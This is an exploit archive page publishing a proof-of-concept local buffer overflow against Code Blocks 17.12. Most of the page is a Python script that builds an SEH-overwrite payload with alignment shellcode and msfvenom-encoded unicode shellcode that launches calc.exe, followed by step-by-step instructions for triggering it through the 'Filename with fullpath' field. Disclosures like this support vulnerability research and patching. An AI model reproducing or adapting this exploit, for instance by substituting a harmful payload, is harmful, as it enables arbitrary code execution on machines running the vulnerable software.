exploit the possibilities

Code Blocks 17.12 Local Buffer Overflow

Code Blocks 17.12 Local Buffer Overflow
Posted Jun 18, 2020
Authored by Paras Bhatia

Code Blocks version 17.12 File Name SEH unicode local buffer overflow exploit.

tags | exploit, overflow, local
MD5 | 068c265e735a68bda5f57b1a8fe5b2d2

Code Blocks 17.12 Local Buffer Overflow

Change Mirror Download
# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC) 
# Vendor Homepage: http://www.codeblocks.org/
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-16
# Vulnerable Software: Code Blocks
# Version: 17.12
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

#Steps to Produce the Crash:

# 1.- Run python code: codeblocks.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for codeblocks.exe
# 4.- Open "codeblocks.exe"
# 5.- Go to "File" > "New" > "Project..."
# 6.- Click on "Files" from left box > Select "C/C++ header" > Clickon "Go" > Click on "Next"
# 7.- Paste ClipBoard into the "Filename with fullpath:" .
# 8.- Click on "Finish".
# 9.- Calc.exe runs.


#################################################################################################################################################

#Python "codeblocks.py" Code:

f= open("codeblocks.txt", "w")

junk1="A" * 2006


nseh="\x61\x62" #popad / align


#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe
seh="\xe0\x50"

ven = "\x62" #align
ven +="\x53" #push ebx
ven += "\x62" #align
ven += "\x58" #pop eax
ven += "\x62" #align
ven += "\x05\x14\x11" #add eax, 0x11001400
ven += "\x62" #align
ven += "\x2d\x13\x11" #sub eax, 0x11001300
ven += "\x62" #align

ven += "\x50" #push eax
ven += "\x62" #align
ven += "\xc3" #ret

junk2="\x41" * 108 #required to make sure shellcode = eax

#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72"
buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50"
buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b"
buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52"
buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31"
buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c"
buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37"
buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a"
buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71"
buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34"
buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79"
buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52"
buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71"
buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30"
buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d"
buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c"
buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b"
buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b"
buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34"
buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32"
buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b"
buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64"
buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30"
buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66"
buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78"
buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d"
buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70"
buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52"
buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43"
buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53"
buf += "\x35\x6d\x30\x41\x41"




junk3 = "\x62" * 5000 #padding to crash



payload = junk1 + nseh + seh + ven + junk2 + buf +junk3

f.write(payload)
f.close
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    17 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close